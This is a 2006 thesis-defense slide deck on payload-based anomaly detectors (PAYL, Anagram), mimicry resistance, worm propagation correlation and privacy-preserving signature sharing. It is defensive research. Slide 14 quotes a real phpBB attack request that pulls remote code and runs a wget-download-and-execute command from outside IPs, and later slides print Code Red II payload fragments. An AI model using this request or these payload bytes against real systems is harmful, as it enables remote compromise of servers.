1
Network Payload-based Anomaly Detection and
Content-based Alert Correlation
Ke Wang
Thesis Defense
Aug. 14th, 2006
Department of Computer Science
Columbia University
2
Why do we need payload-based anomaly detection
- Attacks that are normal connections may carry bad (anomalous) content indicative of a new exploit
- Slow and stealthy, or targeted/hitlist worms do not display "loud and obvious" scanning or propagation behavior detectable via flow statistics
- This sensor augments other sensors and enriches the view of the network
3
Conjecture and Goal: Detect Zero-Day Exploits via Content Analysis
- Worms: propagation detectable via flow statistics (except perhaps slow worms)
- Targeted attacks: sophisticated, stealthy, no "loud and obvious" propagation
- A true zero-day will manifest as "never before seen data" delivered to an application or server
- Learn "typical/normal" data; detect abnormal data
- Generate a signature immediately to stop further propagation; no need to wait for "payload prevalence" (a sufficient number of repeated occurrences of the same content)
- Develop sensors that are accurate, efficient, scalable, and resilient to mimicry attacks
4
Contributions
- Demonstrate the usefulness of analyzing network payload for anomaly detection
  - PAYL: 1-gram modeling
  - Anagram: higher-order n-gram modeling
- Randomized modeling/testing that can help thwart mimicry attacks
- Ingress/egress payload correlation to capture a worm's initial propagation attempt
- Efficient privacy-preserving payload correlation across sites, and automatic signature generation
5
Contributions
- Demonstrate the usefulness of analyzing network payload for anomaly detection
  - PAYL: 1-gram modeling
    - Statistical, semantics/language-independent, efficient
    - Incremental learning
    - Clustering for space saving
    - Multi-centroid fine-grained modeling
  - Anagram: higher-order n-gram modeling
- Randomized modeling/testing that can help thwart mimicry attacks
- Ingress/egress payload correlation to capture a worm's initial propagation attempt
- Efficient privacy-preserving payload correlation across sites
6
Motivation of PAYL
- Content traffic to different ports has very different payload distributions
- Within one port, packets with different lengths also have different payload distributions
- Furthermore, worm/virus payloads are usually quite different from normal distributions
- Previous work:
  - Attack signatures: Snort, Bro
  - First few bytes of a packet: NATE, PHAD, ALAD
  - Service-specific IDS [CKrugel02]: coarse modeling, 256 ASCII characters in 6 groups
7
[Figure: Example byte distributions for different ports; panels show source and destination ports 22 (ssh), 25 (mail), and 80 (web)]
8
Example byte distribution for different payload lengths of port 80 on the same host server
9
CR II distribution versus a normal distribution
10
How to model "normal" content: 1-gram Centroid
The average relative frequency of each byte, and the standard deviation of the frequency of each byte, for payload length 185 of port 80
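The centroid construction described above can be sketched as follows. This is an illustrative, non-incremental version (function names are hypothetical; the actual PAYL sensor updates the model incrementally per port/length bin):

```python
import math

def byte_frequency(payload: bytes) -> list[float]:
    """Relative frequency of each of the 256 byte values in one payload."""
    counts = [0] * 256
    for b in payload:
        counts[b] += 1
    n = max(len(payload), 1)
    return [c / n for c in counts]

def build_centroid(payloads: list[bytes]):
    """Mean and standard deviation of each byte's relative frequency
    across all training payloads in one (port, length) bin."""
    freqs = [byte_frequency(p) for p in payloads]
    m = len(freqs)
    mean = [sum(f[i] for f in freqs) / m for i in range(256)]
    std = [math.sqrt(sum((f[i] - mean[i]) ** 2 for f in freqs) / m)
           for i in range(256)]
    return mean, std
```

In the real sensor one such centroid is kept per destination port and payload-length bin.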
11
PAYL operation
- Learning phase
  - Models are computed from the packet stream incrementally, conditioned on port/service and packet length
  - Hands-free epoch-based training
  - Fine-grained multi-centroid modeling
  - Clustering: merge two neighbouring centroids if their Manhattan distance is smaller than a threshold
    - Saves space, removes redundancy, linear-time computation
    - Improves modeling accuracy for length bins with little training data (sparseness)
- Self-calibration phase
  - Sampled training data sets an initial threshold
- Detection phase
  - Packets are compared against models using a simplified Mahalanobis distance
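The simplified Mahalanobis distance used in the detection phase can be sketched as below; the smoothing factor `alpha` is an assumed detail that prevents division by zero for bytes never observed in training:

```python
def mahalanobis_score(freq, mean, std, alpha=0.001):
    """Simplified Mahalanobis distance between a packet's byte-frequency
    vector and a centroid: sum over the 256 byte values of
    |observed_i - mean_i| / (std_i + alpha)."""
    return sum(abs(f - m) / (s + alpha)
               for f, m, s in zip(freq, mean, std))
```

A packet raises an alert when this score exceeds the calibrated threshold for its (port, length) model.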
12
Performance comparison: single centroid vs. multi-centroids (false positive rates)

Method                          Dataset W   Dataset W1   Dataset EX
Single-centroid                 0.66%       0.487%       0.982%
Multi-centroids (one-pass)      0.42%       0.225%       0.32%
Multi-centroids (semi-batched)  0.0086%     0.029%       0.107%
Test Worms: CR, CRII, WebDAV, and nsiislog.dll buffer overflow vulnerability (MS03-022)
At 0.1% false positive rate: 5.8 alerts/h for EX, 6 alerts/h for W, 8 alerts/h for W1
13
PAYL Summary
- Models: length-conditioned character frequency distribution (1-gram) and standard deviation of normal traffic
- Testing: Mahalanobis distance of the test packet against the model
- Pro: simple, fast, memory efficient
- Con:
  - Cannot capture attacks displaying normal byte distribution
  - Easily fooled by mimicry attacks with proper padding
14
Example: phpBB forum attack
- Relatively normal byte distribution, so PAYL misses it
- Abnormal sequence of commands for exploitation
- The attack invariants: the subsequence of new, distinct byte values should be "malicious"
- What we need: capture order dependence of byte sequences, i.e., higher-order n-gram modeling
GET /modules/Forums/admin/admin_styles.php?phpbb_root_path=http://81.174.26.111/cmd.gif?&cmd=cd%20/tmp;wget%20216.15.209.4/criman;chmod%20744%20criman;./criman;echo%20YYY;echo|..HTTP/1.1.Host:.128.59.16.26.User‑Agent:.Mozilla/4.0.(compatible;.MSIE.6.0;.Windows.NT.5.1;)..
15
Contributions
- Demonstrate the usefulness of analyzing network payload for anomaly detection
  - PAYL: 1-gram modeling
  - Anagram: higher-order n-gram modeling
    - Binary-based modeling
    - Bloom filter for space efficiency
    - Semi-supervised learning
    - Privacy-preserving payload alerts for correlation
- Randomized modeling/testing that can help thwart mimicry attacks
- Ingress/egress payload correlation to capture a worm's initial propagation attempt
- Efficient privacy-preserving payload correlation across sites
16
Overview of Anagram
- Binary-based higher-order n-gram modeling
  - Models all the distinct n-grams appearing in the normal training data
  - During testing, compute the fraction of never-seen distinct n-grams out of the total T n-grams in a packet: Score = N_new / T, in [0, 1]
- Semi-supervised learning
  - Normal traffic is modeled
  - Prior known malicious traffic is modeled: Snort rules, captured malcode
- Model is space-efficient by using Bloom filters
- Previous work
  - Foreign system-call sequences [Forrest96]
  - Trie-based n-gram storage and comparison for network anomaly detection [Rieck06]
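A minimal sketch of this scoring scheme, using a Python set in place of the space-efficient Bloom filter (function names are illustrative, not the thesis's code):

```python
def ngrams(payload: bytes, n: int):
    """All overlapping n-grams of a payload."""
    return [payload[i:i + n] for i in range(len(payload) - n + 1)]

def train(model: set, payload: bytes, n: int = 5):
    """Record every distinct n-gram seen in normal training traffic."""
    model.update(ngrams(payload, n))

def anagram_score(model: set, payload: bytes, n: int = 5) -> float:
    """Fraction of never-seen distinct n-grams out of the total n-grams
    in the packet: 0 = entirely familiar content, 1 = entirely novel."""
    grams = ngrams(payload, n)
    if not grams:
        return 0.0
    new = len({g for g in grams if g not in model})
    return new / len(grams)
```

In the semi-supervised variant a second ("bad content") model is consulted so that n-grams matching known malcode weigh more heavily.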
17
18
19
[Figure: False positive rate (%) at 100% detection rate vs. training dataset length in days, for 3-grams, 5-grams, and 7-grams]
False positive rate (with 100% detection rate) with different training time and different n of n-grams
- Low false positive rate per packet (better per flow)
- No significant gain after 4 days' training
- Higher-order n-grams need longer training time to build a good model
- 3-grams are not long enough to distinguish malicious byte sequences from normal ones
- Normal traffic: real web traffic collected from two CUCS web servers
- Test worms: CR, CRII, WebDAV, Mirela, phpBB forum attack, nsiislog.dll buffer overflow (MS03-022)
20
[Figure: False positive rate (%) at 100% detection rate vs. value n of n-grams, for datasets www1-06 and www-06, each under normal and semi-supervised training]
The false positive rate (with 100% detection rate) for different n-grams, under both normal and semi-supervised training (per-packet rate)
21
Mimicry attacks
- Attackers can mimic normal traffic and hide the exploit inside "the sled" to easily evade the sensor
- Example: the polymorphic mimicry worm developed by [OK05] targeting PAYL, which encodes and blends its traffic to simulate the normal profile
22
Contributions
- Demonstrate the usefulness of analyzing network payload for anomaly detection
- Randomized modeling/testing that can help thwart mimicry attacks
- Ingress/egress payload correlation to capture a worm's initial propagation attempt
- Efficient privacy-preserving payload correlation across sites
23
Randomization against mimicry attacks
- The general idea of payload-based mimicry attacks is to craft small pieces of exploit code with a large amount of "normal" padding to make the whole packet look normal
- If we randomly choose the payload portion for modeling/testing, the attacker cannot know precisely which byte positions it may have to pad to appear normal; it becomes much harder to hide the exploit code
- This is a general technique that can be used for PAYL, Anagram, or any other payload anomaly detector
- For Anagram, additional randomization: keep the n-gram size a secret
24
Randomized Modeling
- Separate the whole packet randomly into several (possibly interleaved) substrings or subsequences S1, S2, ..., SN, and build one model for each of them
- The test packet's payload is divided accordingly
25
Top plot is the model built from the whole packet; the bottom two are the models built from two random sub-partitions.
Shortcomings:
- Models from sub-partitions may be similar: higher memory consumption, no real model diversity
- The test partitioning needs to be the same as the training partitioning: less flexibility, and retraining is needed whenever the partitions change
26
Randomized Testing
- Simpler strategy that does not incur substantial overhead
- Build one model for the whole packet; randomize the tested portions
- Separate the whole packet randomly into several (possibly interleaved) partitions S1, S2, ..., SN
- Score each randomly chosen partition separately
- Use the maximum score: Score = max_i (N_new,i / T_i)
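Randomized testing can be sketched as below. The partition count, the secret-seed handling, and `score_fn` (e.g. an Anagram-style scorer over a byte string) are illustrative assumptions:

```python
import random

def random_partitions(length: int, n_parts: int, seed: int):
    """Assign each byte position to one of n_parts interleaved partitions
    using a secret seed (the 'random mask')."""
    rng = random.Random(seed)
    return [rng.randrange(n_parts) for _ in range(length)]

def randomized_test(payload: bytes, score_fn, n_parts: int = 2, seed: int = 1234):
    """Score each randomly chosen partition of the payload separately
    and return the maximum score."""
    mask = random_partitions(len(payload), n_parts, seed)
    parts = [bytes(b for b, p in zip(payload, mask) if p == k)
             for k in range(n_parts)]
    return max(score_fn(part) for part in parts)
```

Because the mask is secret, the attacker cannot know which bytes of the packet end up in which tested partition.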
27
28
PAYL test on the mimicry attack designed by [OK05] targeting it, 20-fold randomized testing:

Mask method           Detection   Avg. FP   Std. FP
Pure random mask      16/20       0.269%    0.375%
Chunked random mask   14/20       0.175%    0.409%
29
Anagram test: average false positive rate and standard deviation with 100% detection rate, chunked random mask, 10-fold randomized testing (normal and semi-supervised training)
30
Contributions
- Demonstrate the usefulness of analyzing network payload for anomaly detection
- Randomized modeling/testing that can help thwart mimicry attacks
- Ingress/egress payload correlation to capture a worm's initial propagation attempt
  - Detect slow or stealthy worms
  - Immediate signature generation
- Efficient privacy-preserving payload correlation across sites
31
Ingress/egress correlation to detect a worm's propagation
- Observation
  - Self-propagating worms will start attacking other machines (by sending at least the exploit portion of their content) shortly after a host is infected
  - The attacked destination port will be the same, since the worm exploits the same vulnerability
- An approach to stop the worm's very first propagation attempt
  - If we detect anomalous egress packets to port i very similar to anomalous ingress packets to port i, there is a high probability that a worm has started its propagation
- Advantage
  - Can detect slow or stealthy worms which show no probe behavior and thus evade probe detectors
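The correlation step above might be sketched as follows. The buffer structure and threshold are assumptions, and `difflib`'s ratio (a 2*M/(L1+L2)-style score) stands in for the LCS/LCSeq similarity metrics the thesis actually evaluates:

```python
from difflib import SequenceMatcher

# Recent anomalous ingress payloads, keyed by destination port (hypothetical buffer).
ingress_alerts: dict[int, list[bytes]] = {}

def on_ingress_alert(port: int, payload: bytes):
    """Buffer an anomalous inbound payload seen on this destination port."""
    ingress_alerts.setdefault(port, []).append(payload)

def on_egress_alert(port: int, payload: bytes, threshold: float = 0.5) -> bool:
    """Return True if this anomalous outbound packet to `port` is similar
    enough to a recent anomalous inbound packet to the same port --
    evidence that a worm has begun to propagate."""
    for seen in ingress_alerts.get(port, []):
        if SequenceMatcher(None, seen, payload).ratio() >= threshold:
            return True
    return False
```

Because the check fires on the very first similar egress packet, even a slow worm that never scans is caught.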
32
Similarity metrics to compare the payloads of two or more anomalous packet alerts

Metric                              Data used   Handles fragments   Detects metamorphic   Similarity score [0, 1]
String equality (SE)                Raw data    No                  No                    1 if equal, 0 otherwise
Longest common substring (LCS)      Raw data    Yes                 No                    2*C/(L1+L2)
Longest common subsequence (LCSeq)  Raw data    Yes                 Some                  2*C/(L1+L2)
Experiment result
33
|d0|$@|0 ff|5|d0|$@|0|h|d0| @|0|j|1|j|0|U|ff|5|d8|$@|0 e8 19 0 0 0 c3 ff|%`0@|0 ff|%d0@|0 ff|%h0@|0 ff|%p0@|0 ff|%t0@|0 ff|%x0@|0 ff|%|0@|fc fc fc fc fc fc fc fc fc fc fc fc fc fc fc fc fc fc fc 0 0 0 0 0 0 0 0 0 0 0 0 0|\EXPLORER.EXE|0 0 0|SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon|0 0 0|SFCDisable|0 0 9d ff ff ff|SYSTEM\CurrentControlSet\Services\W3SVC\Parameters\Virtual Roots|0 0 0 0|/Scripts|0 0 0 0|/MSADC|0 0|/C|0 0|/D|0 0|c:\,,217|0 0 0 0|d:\,,217|fc fc fc fc fc fc fc fc fc fc fc fc fc fc fc fc fc fc fc fc fc fc fc fc…
LCS signature generation: Code Red II
34
Previous Work
- Worm signature generation: Autograph, Earlybird, Honeycomb, Polygraph, Hamsa
- Detecting frequently occurring payload substrings or tokens from suspicious IPs, which still depends on scanning behavior
- Detection occurs some time after the worm propagates
- Cannot detect slow and stealthy worms
35
Contributions
- Demonstrate the usefulness of analyzing network payload for anomaly detection
- Randomized modeling/testing that can help thwart mimicry attacks
- Ingress/egress payload correlation to capture a worm's initial propagation attempt
- Efficient privacy-preserving payload correlation across sites
  - Robust and privacy-preserving means of representing content-based alerts
  - Automatic signature generation
36
Cross-site payload alert correlation
- Each site has a distinct content flow: diversity via content (not system or software)
- Find global, common "invariants in content"
  - If multiple sites see the same/similar content alerts, it is highly likely to be a true worm/targeted outbreak
  - Separates TPs from FPs: the "False False Positive" problem
- Reduces false positives by creating white lists of those alerts that cannot be correlated
- Higher bar against mimicry attacks: exploit writers/attackers have to learn the distinct content traffic patterns of many different sites
- Needs to be privacy-preserving
37
Related Research
- DNAD/Worminator (slow/IP) sharing
- Domino alert sharing
- The DShield.org model for content sharing and querying
- Could also serve as a "trap" to detect attacker watermarking behavior
- PeerPressure, privacy-preserving friends troubleshooting network
38
Correlation techniques
- Baseline: "raw" suspect-content string-based correlation
  - String equality (SE), longest common substring (LCS), longest common subsequence (LCSeq), edit distance (ED)
- Frequency-modeled 1-gram correlation
  - Frequency distribution: Manhattan distance
  - Z-String: supports SE, LCS, LCSeq, ED
- Binary-modeled n-gram correlation
  - N-gram signature, Bloom filter n-gram "signature"
39
Example suspect content: "This is a bot command string" (original content: 256 bits)
- Frequency distribution: the most frequent character is a space (ASCII code 32); size ≈ 8160 bits
- List of 3-grams in the original string (□ represents a space; "is□" appears twice in the original alert): Thi, his, is□, s□i, □is, s□a, □a□, a□b, □bo, bot, ot□, t□c, □co, com, omm, mma, man, and, nd□, d□s, □st, str, tri, rin, ing; 25 n-grams take approximately 600 bits
- Bloom filter of the above n-grams: 0000011010101101001101100110101101010…01010011101010101111000; if three hash values are used, a minimum optimal size would be ~150 bits
- Z-String: □isamnotTbcdghr (the space is the most frequent character; non-appearing characters are removed); 15 characters = 120 bits
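A minimal Bloom filter over such n-grams might look like this. The bit-array size, hash count, and SHA-1-based hashing are illustrative choices, not the thesis's parameters:

```python
import hashlib

class BloomFilter:
    """Insert-only Bloom filter for n-grams: a bit array with k hashes.
    Membership tests can yield false positives but never reveal the raw
    n-grams, which is what makes shared alerts privacy-preserving."""
    def __init__(self, m_bits: int = 1024, k: int = 3):
        self.m, self.k, self.bits = m_bits, k, bytearray(m_bits // 8)

    def _positions(self, item: bytes):
        # k deterministic bit positions derived from salted SHA-1 digests
        for i in range(self.k):
            h = hashlib.sha1(bytes([i]) + item).digest()
            yield int.from_bytes(h[:8], "big") % self.m

    def add(self, item: bytes):
        for p in self._positions(item):
            self.bits[p // 8] |= 1 << (p % 8)

    def __contains__(self, item: bytes) -> bool:
        return all(self.bits[p // 8] & (1 << (p % 8))
                   for p in self._positions(item))
```

Two sites can then correlate alerts by exchanging only these bit arrays and intersecting them bitwise.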
40
Real traffic evaluation (string evaluation)
- Goal: measure performance in separating true alerts from false positives
  - Ideal: true positives have very high similarity scores, while false positives have very low scores
- Mix the collection of attacks into two hours of traffic from www and www1
  - Multiple, differently-fragmented instances of Code Red and Code Red II to simulate a real worm attack
- Mixed sets are run through PAYL and Anagram, with the alerting threshold reduced so that 100% of attacks are detected, but with possibly higher FP rates
41
Real traffic evaluation (II)
- False positive score range; blue bar represents the 99.9th percentile, white the maximum score
- Range of scores across multiple instances of the same worm (CR or CRII)
- Range of scores across instances of different worms (CR vs. CRII), e.g., polymorphism
- Methods are, from 1 to 8: Raw-LCS, Raw-LCSeq, Raw-ED, Freq-MD, ZStr-LCS, ZStr-LCSeq, ZStr-ED, N-grams with n=5
42
Real traffic evaluation (III)
- Correlation of identical (non-polymorphic) attacks works accurately for all techniques
  - Non-fragmented attacks score near 1
  - Z-Strings (MD, LCSeq, ED) and n-grams handle fragmentation well
- Polymorphism is hard to detect; only Raw-LCSeq and n-grams score well
- Overall, n-grams are particularly effective at eliminating false positives, and Bloom filters enable privacy preservation
43
Signature Generation
- Each class of techniques can generate its own signature
- Raw packets: exchange LCS/LCSeq
  - Not privacy-preserving
- Byte frequency/Z-Strings
  - Given the frequency distribution, Z-Strings are generated by ordering bytes from most to least frequent and dropping the least frequent
- N-grams
  - Robust to reordering or fragmentation
  - If position information is available, can be "flattened" into a deployable string signature
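The Z-String construction described above, sketched in a few lines (the tie-breaking rule among equally frequent bytes is an assumption, and the truncation of the rarest bytes is omitted):

```python
from collections import Counter

def z_string(payload: bytes) -> bytes:
    """Z-String: byte values ordered from most to least frequent;
    bytes that never appear are dropped.  Ties are broken here by
    byte value, which is an assumed detail."""
    counts = Counter(payload)
    ordered = sorted(counts, key=lambda b: (-counts[b], b))
    return bytes(ordered)
```

Since only the rank order of byte values is shared, the Z-String reveals no raw payload content.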
44
Signature/Query generation (II)

Original CRII packet (first 300 bytes):
GET./default.ida?XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX%u9090%u6858%ucbd3%u7801%u9090%u6858%ucbd3%u7801%u9090%u6858%ucbd3%u7801%u9090%u9090%u8190%u00c3%u0003%u8b00%u531b%u53ff%u0078%u0000%u0

Byte frequency distribution: [figure]

Z-String (first bytes, ASCII values):
88 0 255 117 48 85 116 101 106 232 100 133 80 254 169 137 56 51

Flattened 5-grams (first 172 bytes; "*" implies wildcard):
* /def*ult.ida?XXXX*XXXX%u9090%u6858%ucbd3%u7801%u9090%u6858%ucbd3%u7801%u9090%u6858%ucbd3%u7801%u9090%u9090%u8190%u00c3%u0003%u8b00%u531b%u53ff%u0078%u0000%u00=a HT*: 3379
45
Accuracy of the signatures
The cumulative frequency of the signature match scores computed by matching normal traffic against different worm signatures; the closer to the y-axis, the more accurate.
The six curves represent, in order from left to right: 1) n-gram signature, 2) Z-String signature compared using LCS, 3) LCSeq of raw signature, 4) Z-String signature using LCSeq, 5) LCSeq of raw signature, 6) byte-frequency signature.
46
Signature for polymorphic worms
- Our approaches work poorly here, since they are based on payload similarity
- Will there be enough invariants for an accurate signature?
  - Slammer: first byte "0x04"
  - CLET shellcode 2: "\0xff\0xff\0xff" and "\0xeb\0x31"
- Proposed alternative: a "generalized signature" specifying the higher-level pattern of an attack instead of the raw payload, e.g. "0xeb 0x31"B {92 bytes, entropy: E, "0xff 0xff 0xff"B}
47
Conclusions
- Network payload-based PAYL and Anagram can detect zero-day attacks with high accuracy and low false positives
- Randomization helps thwart mimicry attacks
- Ingress/egress correlation detects a worm's initial propagation and generates accurate worm signatures
  - Good at detecting slow/stealthy worms
- Privacy-preserving payload alert correlation across sites can identify true anomalies and reduce false positives
  - Accurate signature generation
48
Accomplishments
Major papers:
- Anagram: A Content Anomaly Detector Resistant to Mimicry Attack, K. Wang, J. Parekh, S. Stolfo, RAID, Sept. 2006.
- Privacy-preserving Payload-based Correlation for Accurate Malicious Traffic Detection, J. Parekh, K. Wang, S. Stolfo, SIGCOMM LSAD Workshop, Sept. 2006.
- Anomalous Payload-based Worm Detection and Signature Generation, K. Wang, G. Cretu, S. Stolfo, RAID, Sept. 2005.
- FLIPS: Hybrid Adaptive Intrusion Prevention, M. Locasto, K. Wang, A. Keromytis, S. Stolfo, RAID, Sept. 2005.
- Anomalous Payload-based Network Intrusion Detection, K. Wang, S. Stolfo, RAID, Sept. 2004.
Software implementation (licensed by Columbia):
- PAYL sensor
- Anagram sensor
49
Future Work
- Further evaluation, including measures/features of high-entropy partitions
- Optimization problem: model parameter settings (n-gram size, thresholds, etc.), random mask generation
- Real deployment of multiple-site correlation
- Shadow server architecture implementation and testing
- Pushing into the host: integration with instrumented application software
50
Thank you! Q/A?
51
Backup slides
52
Overview of PAYL: How it works
- Principles of operation
  - Normal packet content is automatically learned
  - Based upon unsupervised anomaly detection algorithms
- Fine-grained modeling of normal payload
  - Site- and application-specific, also conditioned on packet length
  - Build the byte frequency distribution and its standard deviation as the normal profile
- For test data, compute the simplified Mahalanobis distance against its centroid to measure similarity
53
Unsupervised Anomaly Detection: Core Technology
- Each site/host has a "unique" content flow that may be automatically learned
- UAD generates a model over "unlabeled" data
- The model detects
  - Anomalies in collected training data (forensics)
  - Anomalies in the data stream (detection)
- Computational approach: outlier detection
  - Two frameworks: geometric, probabilistic/statistical
  - Several algorithms; PAYL is based upon comparison of content statistical distributions
- Handles "noise" in data
  - No guarantees of "attack-free" data
  - Assumes most data is "attack-free"
Return to main slides
54
Epoch-based learning
To determine how much training data is enough, or whether the model is ready for use
An epoch is measured in terms of the number of packets analyzed, or by means of a time period
The training phase is sufficiently complete if the currently computed model has changed little for several consecutive epochs
Need to define model similarity measurements
55
Epoch-based learning: PAYL
Metric 1: the number of new centroids produced in the current epoch
Metric 2: the Manhattan distance of each centroid to the nearest one computed in the prior epoch
Return to main slides
56
[Figure: likelihood of seeing new n-grams per 10,000 content packets, plotted for 3-grams, 5-grams, and 7-grams]
The likelihood of seeing new n-grams, i.e. the percentage of new distinct n-grams out of the total n-grams in this epoch
Epoch-based learning: Anagram
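This convergence check, tracking the fraction of never-seen n-grams per epoch, could be sketched as follows (an illustration; the epoch contents and n-gram length below are arbitrary choices):

```python
def ngrams(payload: bytes, n: int):
    """All overlapping n-grams of a payload."""
    return (payload[i:i + n] for i in range(len(payload) - n + 1))

def new_ngram_rate(seen: set, packets, n: int = 5) -> float:
    """Fraction of distinct, never-before-seen n-grams among all n-grams
    in this epoch's packets; updates `seen` in place."""
    total = 0
    new = set()
    for p in packets:
        for g in ngrams(p, n):
            total += 1
            if g not in seen and g not in new:
                new.add(g)
    seen.update(new)
    return len(new) / total if total else 0.0
```

Training could be declared complete once this rate stays below a small threshold for several consecutive epochs.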
57
The computed Mahalanobis distance of the normal and attack packets
The normal data's distances are displayed as several bands, which illustrates that we might have multiple centroids for one length
58
Multiple centroids modeling for each length
Goal: build finer-grained models for the payload to detect anomalies more accurately
Problems:
Don't know how many clusters may exist
Can only access each packet's data once, in sequence; cannot store the packets in memory
So traditional clustering algorithms like K-means and EM cannot be easily applied here
Our solution:
One-pass online clustering
Improvement: semi-batched one-pass clustering (keep a small buffer and do locally optimal clustering)
Back
59
Simplified Mahalanobis Distance
Standard metric to compare two statistical distributions:
d²(x, y) = (x − y)ᵀ C⁻¹ (x − y),  where C_ij = Cov(y_i, y_j)
x is the test data, and y is its profile.
When we assume each ASCII value is independent, the formula can be simplified:
d(x, y) = Σ_{i=0..n−1} |x_i − y_i| / (σ_i + α)   (α is a small smoothing factor)
Return to main slides
60
Incremental Learning
Average of N data points:
x̄_N = (1/N) Σ_{i=1..N} x_i
When the (N+1)th data point arrives:
x̄_{N+1} = (N · x̄_N + x_{N+1}) / (N + 1)
For the standard deviation, we can rewrite it as the following:
Var(X) = E(X − EX)² = E(X²) − (EX)²
Therefore, we don't need to keep previous data to update the new average and standard deviation
Now each centroid stores only the averages of x and x²
Return to main slides
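These incremental updates can be sketched as a small running-statistics class (illustrative only), keeping just the averages of x and x²:

```python
class RunningStats:
    """Incrementally maintained mean and standard deviation: stores only
    the running averages of x and x^2, as on the slide."""
    def __init__(self):
        self.n = 0
        self.mean_x = 0.0   # running average of x
        self.mean_x2 = 0.0  # running average of x^2

    def add(self, x: float):
        self.n += 1
        # new_mean = (old_mean * (N - 1) + x) / N, in update form
        self.mean_x += (x - self.mean_x) / self.n
        self.mean_x2 += (x * x - self.mean_x2) / self.n

    def variance(self) -> float:
        # Var(X) = E(X^2) - (E X)^2
        return max(self.mean_x2 - self.mean_x ** 2, 0.0)

    def stddev(self) -> float:
        return self.variance() ** 0.5
```

No history of samples is kept, yet the mean and standard deviation stay exact.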
61
Manhattan distance
Mdis(x, y) = Σ_{i=0..n−1} |x_i − y_i|
[Figure: example byte distributions x and y]
Example: Mdis(x, y) = Σ_{i=1..6} |x_i − y_i| = 23
62
Example of clustering across length bins
Original centroids
Clustered centroids
Return to main slides
63
Self-calibration
Training data is sampled
Use a FIFO to keep the most recent samples, to capture concept drift
After training, compute the distances of the samples against the centroid and set the anomaly threshold to the maximum
At the start of the detection phase, increase the threshold by t% if the alert rate is higher than a user-specified parameter
Return to main slides
64
One-pass online clustering algorithm
Problem: the incoming order of the packets affects the result
while (more packets) {
    p = next packet
    if (p is similar to one of the existing centroids)
        merge p into that centroid
    else
        create a new centroid; use p as center
    if (total number of centroids > MaxSize)
        merge the two nearest ones
}
Return to main slides
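A Python rendering of this loop might look like the following (a sketch: the similarity threshold, the merge rule, and the size limit are illustrative choices, applied to byte-frequency vectors with Manhattan distance):

```python
def manhattan(x, y):
    return sum(abs(a - b) for a, b in zip(x, y))

def one_pass_cluster(distributions, threshold=0.5, max_size=4):
    """One-pass online clustering of byte-frequency vectors.
    Each centroid is (mean_vector, count); results depend on input order."""
    centroids = []
    for d in distributions:
        # find the nearest existing centroid, if any
        best = min(range(len(centroids)), default=None,
                   key=lambda i: manhattan(centroids[i][0], d))
        if best is not None and manhattan(centroids[best][0], d) < threshold:
            c, n = centroids[best]  # merge d into that centroid
            centroids[best] = ([(ci * n + di) / (n + 1)
                                for ci, di in zip(c, d)], n + 1)
        else:
            centroids.append((list(d), 1))  # new centroid centered at d
        if len(centroids) > max_size:
            # merge the two nearest centroids
            i, j = min(((i, j) for i in range(len(centroids))
                        for j in range(i + 1, len(centroids))),
                       key=lambda ij: manhattan(centroids[ij[0]][0],
                                                centroids[ij[1]][0]))
            (c1, n1), (c2, n2) = centroids[i], centroids[j]
            merged = ([(a * n1 + b * n2) / (n1 + n2)
                       for a, b in zip(c1, c2)], n1 + n2)
            centroids[i] = merged
            del centroids[j]
    return centroids
```

Because each point is folded in as it arrives, a different packet ordering can yield different centroids, which is exactly the problem the semi-batched variant mitigates.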
65
Continued …
merge(c_set1, c_set2) {
    for (each c in c_set1) {
        if (c is similar to one of the centroids in c_set2)
            merge c into that centroid
        else
            add c as a new centroid to c_set2
    }
    if (size of c_set2 > MaxNum)
        merge the two nearest ones until (size == MaxNum)
}
Return to main slides
66
Improvement: Semi-batched one-pass clustering for stream processing
Main idea:
Store byte distributions of M packets
Optimize aggregate clustering of the M packets
Merge the resulting centroids into the existing centroids from the prior batch of data
Can ameliorate the problem of packet ordering
The batch size M needs to be chosen properly: a tradeoff between accuracy and memory consumption
67
One-pass clustering result. First six centroids for W dataset, length 1460
68
Semi-batch clustering result. First six centroids for W dataset, length 1460
Return to main slides
69
Performance
Training over 3 days of data, detection over 2 days
Data from two web servers
Training: 29 seconds (60 Mbits/sec)
Detection: 12 seconds (54 Mbits/sec)
FP rate: 42 / 625,595 packets (0.006%)
Coverage: 20/30 known attacks in the data detected
70
Bloom filter
A Bloom filter (BF) is a one-way data structure that supports insert and verify operations, yet is fast and space-efficient
Represented as a bit vector; bit b is set if h_i(e) = b, where h_i is a hash function and e is the element in question
No false negatives, although false positives are possible in a saturated BF via hash collisions; use multiple hash functions for robustness
Each n-gram is a candidate element to be inserted or verified in the BF
Bloom filters are also privacy-preserving, since n-grams cannot be extracted from the resulting bit vector
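A toy version of this insert/verify interface (the hash family and sizes are illustrative choices, not the sensor's actual parameters):

```python
import hashlib

class BloomFilter:
    """Minimal Bloom filter: insert and verify only. Elements (e.g. n-grams)
    cannot be recovered from the bit vector, which is what makes sharing it
    privacy-preserving."""
    def __init__(self, m_bits: int = 2 ** 16, k_hashes: int = 3):
        self.m = m_bits
        self.k = k_hashes
        self.bits = bytearray(m_bits // 8)

    def _positions(self, e: bytes):
        # derive k bit positions from salted SHA-1 digests (illustrative choice)
        for i in range(self.k):
            h = hashlib.sha1(bytes([i]) + e).digest()
            yield int.from_bytes(h[:8], "big") % self.m

    def insert(self, e: bytes):
        for b in self._positions(e):
            self.bits[b // 8] |= 1 << (b % 8)

    def verify(self, e: bytes) -> bool:
        # no false negatives; false positives possible if the filter saturates
        return all(self.bits[b // 8] & (1 << (b % 8))
                   for b in self._positions(e))
```

Each distinct n-gram observed in training would be inserted; at detection time an n-gram is "new" exactly when `verify` fails.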
71
Return to main
72
Anagram: semi-supervised learning
The binary-based approach is simple and efficient, but too sensitive to noisy data
Pre-compute a bad content model using Snort rules and a collection of worm samples, to supervise the learning
This model should match very few normal packets, while being able to identify malicious traffic (often, new exploits reuse portions of old exploits)
The model contains the distinct n-grams appearing in these malcode collections
Use a small, clean dataset to exclude the normal n-grams appearing in the Snort rules and viruses
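The construction can be sketched as a set difference over distinct n-grams (the sample inputs in the test are hypothetical):

```python
def distinct_ngrams(payloads, n=5):
    """Set of all distinct n-grams across a collection of payloads."""
    grams = set()
    for p in payloads:
        for i in range(len(p) - n + 1):
            grams.add(p[i:i + n])
    return grams

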